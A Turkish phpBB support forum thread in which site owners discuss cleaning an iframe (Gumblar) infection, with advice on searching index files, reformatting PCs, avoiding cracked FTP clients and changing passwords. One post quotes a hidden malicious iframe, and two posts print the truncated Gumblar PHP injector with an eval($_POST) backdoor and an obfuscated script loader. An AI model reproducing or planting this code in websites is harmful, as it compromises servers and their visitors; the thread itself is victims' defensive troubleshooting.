Siteme İframe Virüsü Bulaştı!

phpBB 3.0.x çalıştırılması ve kurulumu ile ilgili yardımı buradan alabilirsiniz. Lütfen MODlar ile ilgili sorunlarınızı buraya yazmayın.
Forum kuralları
- Yeni bir başlık açarken lütfen konu başlığına "Acil yardım", "Acele yardım" tarzlarında içerisinde "yardım" kelimesi geçen cümleler yazmayınız. Bu tip başlıklara kesinlikle cevap verilmeyecektir. Lütfen konu başlığına içeriği en iyi özetleyen anlaşılabilir bir cümle yazınız.

- Ayrıca yeni başlıklarınızı kesinlikle ilgili forumlara açınız. Örneğin, phpBB3 kurulum ve çalıştırması hakkında bir sorununuz varsa "3.0.x Destek Forumu" forumuna başlık açınız; phpBB3 temasından kaynaklı bir sorunuz varsa "3.0.x Stil/Tema Geliştirme & Tartışma & Yardım" forumuna başlık açınız; phpBB3 mod/eklentileriyle ilgili sorununuz varsa "3.0.x MOD Destek" forumuna başlık açınız. Bu kurala uymayan kullanıcıların başlıkları silinebilir ve kullanıcı uyarı alabilir ya da süresiz uzaklaştırılabilir.

- Site kurallarımızı okumadan kesinlikle forumlarımıza herhangi bir katılım yapmayınız.
Kullanıcı avatarı
Pierce_MVP
Kayıtlı Kullanıcı
İletişim:

Siteme İframe Virüsü Bulaştı!

Mesaj gönderen Pierce_MVP »

Arkadaşlar sitemde iframe olarak saklı bir link virüsü var.Bunun çözümlerini okudum.index.php ve index.html dosyalarının altında bulunuyor saklı olarak bende düzelttim virüs taramsından geçirerek tekrar ftpden gönderdim.Çoğu yer düzeldi ancak sayfa kaynak kodunu tekrar göster deyince üstte yine google analystic linki diye kandırarak bir link var birtek onu bulamadım.Sizce hangi dosyaya bakmamış olabilirim?
Arada nostalji amacli ugruyorum buraya. Cok guzel gunlerdi :'(
Kullanıcı avatarı
Özcan Akbulut
Kayıtlı Kullanıcı
İletişim:

Re: Siteme İframe Virüsü Bulaştı!

Mesaj gönderen Özcan Akbulut »

overall_header.html ve footere bak.
akblt.space

Başlangiç Bilgileri phpBB 3.0.x :: 3.1.x
Kullanıcı avatarı
Pierce_MVP
Kayıtlı Kullanıcı
İletişim:

Hayır o dosyalarda yok.Dediğim gibi index.php ve index.html dosyalarında bulunuyor.İçinizden biri usanmadan tüm index dosyalarının nerde olduğunu yazabilirmi? :mrgreen:
Kullanıcı avatarı
piyanistsb2
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen piyanistsb2 »

phpbb3 klasöründe index diye arama yap hepsi çıkar :mrgreen:
YAŞASAM MI? ÖLSEM Mİ?
KARAR VERMEK ZOR!!!!!

[ resmi görüntülemek için tıklayın ]
basoglanh
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen basoglanh »

Bilgisayarınıza format atmayı denerseniz daha iyi olur. Pc'den bulaşan iframeler çok çok fazla.
Yeni bir güne gülümse !
Kullanıcı avatarı
Pierce_MVP
Kayıtlı Kullanıcı
İletişim:

basoglanh yazdı:Bilgisayarınıza format atmayı denerseniz daha iyi olur. Pc'den bulaşan iframeler çok çok fazla.
Evet ilk işim pcye format atmak olacak.Sonra sitenin ftp dosyalarını indirip index dosyalarındaki dosyaları gözden geçirerek iframe linklerini silerim virüs taramasından geçirdikten sonra ftpye atayım.Sizce böyle bir yol nasıl olur?
Kullanıcı avatarı
akansu
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen akansu »

Evet ilk işim pcye format atmak olacak.Sonra sitenin ftp dosyalarını indirip index dosyalarındaki dosyaları gözden geçirerek iframe linklerini silerim virüs taramasından geçirdikten sonra ftpye atayım.Sizce böyle bir yol nasıl olur?
Evet olabilir.

Bir iki tavsiye daha vereyim geçen bir site de benim de başıma geldi. Dreamvawer varsa onunla klasörse ara diyerek kullandığın temanın tüm klasörlerinde <iframe> diye arattırabilirisn.

Crack lı FTP programı kullanma.
Hostundan virüs taraması için talepte bulun.
Ana dizindeki .htaccess dosyanı gözden geçir.
Gayemiz, imkansızı mümkün, mümkünü kolay, kolayı zarif ve zevkli yapmanın yollarını bulmaktır.

phpBB3 Temaları | SufiForum
Kullanıcı avatarı
Pierce_MVP
Kayıtlı Kullanıcı
İletişim:

akansu yazdı:
Evet olabilir.

Bir iki tavsiye daha vereyim geçen bir site de benim de başıma geldi. Dreamvawer varsa onunla klasörse ara diyerek kullandığın temanın tüm klasörlerinde <iframe> diye arattırabilirisn.

Crack lı FTP programı kullanma.
Hostundan virüs taraması için talepte bulun.
Ana dizindeki .htaccess dosyanı gözden geçir.
Evet bu dediklerinide mantıklı denerim sağolasın.Umarım düzelir google siteyi zararlı olarak bildiriyor malesef.
Kullanıcı avatarı
Ademx33
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen Ademx33 »

akansu yazdı: Crack lı FTP programı kullanma.
Niye virüsmü bulaştırır Cracklı FTP ?
Ee o zaman nasıl atacağız cracksız normal FTP ile hosta ?
Forever PhpBB3 - Http://www.PhpBBTurkey.Com sayesinde kendi phpbb3 sitemi kurabildim.

Sağ üst köşede ARAMA bölümü var aklınıza takılan her türlü sorununuzu oraya yazarsanız uğraşmak zorunda kalmazsınız...
Kullanıcı avatarı
akansu
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen akansu »

Ademx33 yazdı:
Niye virüsmü bulaştırır Cracklı FTP ?
Evet cracklı FTP kullanmak bu gibi sorunlara sebebiyet verebilir. Bu sıralar bu iframe virüsü çok yaygın.Sebebini tam olarak bilmiyorum. Nereden bulaşıyor emin değilim ama Cracklı FTP olası sebeplerden birisi.
Ee o zaman nasıl atacağız cracksız normal FTP ile hosta ?
Ücretsiz FTP programları var. Mesela Filezilla. Ama bu iframe kodu bulaşmış biri daha vardı bildiğim FileZilla kullanıyordu .Demekki bu aralar dolaşan bu ifare salgınının sebebi cracklı FTP olmayabilir.Ama bazıları için olabilirde.
Gayemiz, imkansızı mümkün, mümkünü kolay, kolayı zarif ve zevkli yapmanın yollarını bulmaktır.

phpBB3 Temaları | SufiForum
Kullanıcı avatarı
Pierce_MVP
Kayıtlı Kullanıcı
İletişim:

Evet bu aralar baya yaygın şu iframe virüsü.Ve bir kurbanıda ben oldum o yüzden virüsten kaynayan pcniz varsa kesinlikle ftpyle bağlanmayın!Şimdiden söyleyim yoksa benim hala başım ağrıdığı gibi sizinde ağrır.Bu virüs konusu çok önemli.

Ve birşey daha soracam.Sitemin anasayfasında bir tane daha iframe kodu var üstte

Kod: Tümünü seç

<iframe src="http://google-ana1yticz.com/?click=114A903" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
ve bu iframe linkini bulamadım bir türlü.Sadece anasayfada duruyor ama.Diğer konula vb. yerlerde yok.
adyghe
Kayıtlı Kullanıcı

Mesaj gönderen adyghe »

benzeri bi sorun benimde başımı ağrıttı 2 gündür, biraz araştırdım karşılaşan çok ama henüz kesin bi çözümü yok. bikaç öneride bulunan olmuş ve deneyenler sorunun şuan için çözüldüğünden bahsediyor onlardan biri de benim :)

farklı bi pc'den kracksiz ftp programı ile hostuma girdim ve son bikaç günde hosta attığım dosyaları indirip teker teker düzenleyip geri attım.
kendi pc'mdeki dosyalara baktığımda index.html, overall_footer.html ve de bikaç html'de daha olduğunu gördüm fakat isimleri tam aklımda değil şuan. en son 3-4 ay önce içinde işlem yaptığım dosyalara dahi girmiş yani bunda olur şunda olmaz demeyin erinmeyip bütün dosyalarınıza bakın. index.html'lerde kesin oluyor.

dreamweaver, expression artık hangi programı kullanıyorsanız kaldırıp yeniden kurun.
birvurgunbusevda..
aliozdil
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen aliozdil »

Bazı sayfalarda aşağıdaki kodu buldum bu virüs müdür?

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihMVDNJKXt2YXIgWEtLQjU9J3YhNjEhNzIhMjAhNjEhM2QhMjJTYyE3MmlwdEUhNmVnITY5bmUhMjIhMmNiITNkITIyVmVycyE2OW9uITI4ITI5KyEyMiEyYyE2YSEzZCEyMiEyMiEyY3UhM2RuYXZpZ2F0byE3MiEyZXVzZXJBZyE2NW50ITNiaWYoKHUhMmVpITZlZGV4T2YhMjghMjJDaHJvbWUhMjIpITNjMCkhMjYhMjYoITc1ITJlITY5bmQhNjV4T2YoITIyITU3aW4hMjIpITNlMCkhMjYhMjYodSEyZWkhNmUhNjRleE9mKCEyMk5UITIwNiEyMikhM2MwITI5ITI2ITI2ITI4ITY0b2N1ITZkZSE2ZXQhMmVjb28hNmIhNjkhNjUhMmVpbiE2NGV4T2YhMjghMjJtaSE2NWshM2QxITIyKSEzYzAhMjkhMjYhMjYodCE3OXBlbyE2Nih6ITcydiE3YXRzKSEyMSEzZHR5cGVvZighMjIhNDEhMjIpKSEyOSE3YiE3YXJ2enRzITNkITIyQSEyMiEzYmV2YSE2YyghMjJpITY2KHdpbmRvITc3ITJlITIyITJiYSshMjIpITZhITNkaiEyYiEyMiEyYmErITIyTWFqb3IhMjIrYithKyEyMiE0ZGlub3IhMjIrYithKyEyMkJ1aWwhNjQhMjIrITYyKyEyMiE2YSEzYiEyMikhM2Jkb2N1bWVuITc0ITJld3JpdGUoITIyITNjc2NyaSE3MHQhMjBzcmMhM2QhMmYhMmZtITIyITJiITIyYSE3MnR1ITdhITJlY24hMmYhNzZpZCEyZiEzZmlkITNkITIyK2ohMmIhMjIhM2UhM2MhNWMhMmZzYyE3MmlwdCEzZSEyMikhM2IhN2QnO3ZhciBnenRVSz11bmVzY2FwZShYS0tCNS5yZXBsYWNlKExUM0ksJyUnKSk7ZXZhbChnenRVSyl9KSgvXCEvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler
basoglanh
Kayıtlı Kullanıcı
İletişim:

Mesaj gönderen basoglanh »

aliozdil yazdı:Bazı sayfalarda aşağıdaki kodu buldum bu virüs müdür?

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihMVDNJKXt2YXIgWEtLQjU9J3YhNjEhNzIhMjAhNjEhM2QhMjJTYyE3MmlwdEUhNmVnITY5bmUhMjIhMmNiITNkITIyVmVycyE2OW9uITI4ITI5KyEyMiEyYyE2YSEzZCEyMiEyMiEyY3UhM2RuYXZpZ2F0byE3MiEyZXVzZXJBZyE2NW50ITNiaWYoKHUhMmVpITZlZGV4T2YhMjghMjJDaHJvbWUhMjIpITNjMCkhMjYhMjYoITc1ITJlITY5bmQhNjV4T2YoITIyITU3aW4hMjIpITNlMCkhMjYhMjYodSEyZWkhNmUhNjRleE9mKCEyMk5UITIwNiEyMikhM2MwITI5ITI2ITI2ITI4ITY0b2N1ITZkZSE2ZXQhMmVjb28hNmIhNjkhNjUhMmVpbiE2NGV4T2YhMjghMjJtaSE2NWshM2QxITIyKSEzYzAhMjkhMjYhMjYodCE3OXBlbyE2Nih6ITcydiE3YXRzKSEyMSEzZHR5cGVvZighMjIhNDEhMjIpKSEyOSE3YiE3YXJ2enRzITNkITIyQSEyMiEzYmV2YSE2YyghMjJpITY2KHdpbmRvITc3ITJlITIyITJiYSshMjIpITZhITNkaiEyYiEyMiEyYmErITIyTWFqb3IhMjIrYithKyEyMiE0ZGlub3IhMjIrYithKyEyMkJ1aWwhNjQhMjIrITYyKyEyMiE2YSEzYiEyMikhM2Jkb2N1bWVuITc0ITJld3JpdGUoITIyITNjc2NyaSE3MHQhMjBzcmMhM2QhMmYhMmZtITIyITJiITIyYSE3MnR1ITdhITJlY24hMmYhNzZpZCEyZiEzZmlkITNkITIyK2ohMmIhMjIhM2UhM2MhNWMhMmZzYyE3MmlwdCEzZSEyMikhM2IhN2QnO3ZhciBnenRVSz11bmVzY2FwZShYS0tCNS5yZXBsYWNlKExUM0ksJyUnKSk7ZXZhbChnenRVSyl9KSgvXCEvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler

Normal phpBB dosyalarında bu gibi kodlar olmadığını sanıyorum. Kurduğunuz eklentilerden kaynaklanan bir kod dilimi olabilir.Birde verdiğiniz kodlar tam olarak hangi dosyalardan çıktı yazarsanız daha iyi olur.
Yeni bir güne gülümse !
Kullanıcı avatarı
bplr
Kayıtlı Kullanıcı

Mesaj gönderen bplr »

Bu eklenti değil, iframe gumblar virüsü.
Çözümü, virus gelmeden önceki dosya yedeklerine dönmek, yada virüsü temizlemek, temizlenemiyorsa, tüm phpBB3 dosyalarını silip temiz bir forum zip dosyası indirip sunucuya yüklemek.
Muhtemelen, filezilla gibi şifreleri pc de açık saklayan bir ftp programı yoluyla hosting şifrenizi virus programı öğrendi, bu sebeple kullandığınız pc yi de virüslerden temizleyin, en garantisi formatlayın.
Ayrıca da, tüm şifrelerinizi de değiştirin.
Kilitli

“3.0.x Destek Forumu” sayfasına dön

Kimler çevrimiçi

Bu forumu görüntüleyen kullanıcılar: Hiç bir kayıtlı kullanıcı yok ve 1 misafir